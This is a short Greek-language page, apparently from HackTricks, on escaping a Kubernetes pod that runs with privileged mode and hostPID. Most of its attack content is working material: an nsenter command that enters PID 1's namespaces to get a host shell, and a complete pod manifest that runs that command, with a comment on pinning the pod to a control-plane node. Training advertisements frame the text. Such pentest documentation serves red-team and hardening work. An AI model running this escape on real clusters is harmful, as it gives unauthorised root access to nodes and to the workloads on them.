Pod Escape Privileges

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Privileged and hostPID

Με αυτά τα δικαιώματα θα έχετε πρόσβαση στις διαδικασίες του host και αρκετά δικαιώματα για να εισέλθετε μέσα στο namespace μιας από τις διαδικασίες του host.
Σημειώστε ότι μπορεί να μην χρειάζεστε προνόμια αλλά απλώς κάποιες ικανότητες και άλλες πιθανές παρακάμψεις αμυνών (όπως apparmor και/ή seccomp).

Απλά εκτελώντας κάτι σαν το παρακάτω θα σας επιτρέψει να διαφύγετε από το pod:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Παράδειγμα διαμόρφωσης:

apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command:
[
"nsenter",
"--target",
"1",
"--mount",
"--uts",
"--ipc",
"--net",
"--pid",
"--",
"bash",
]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks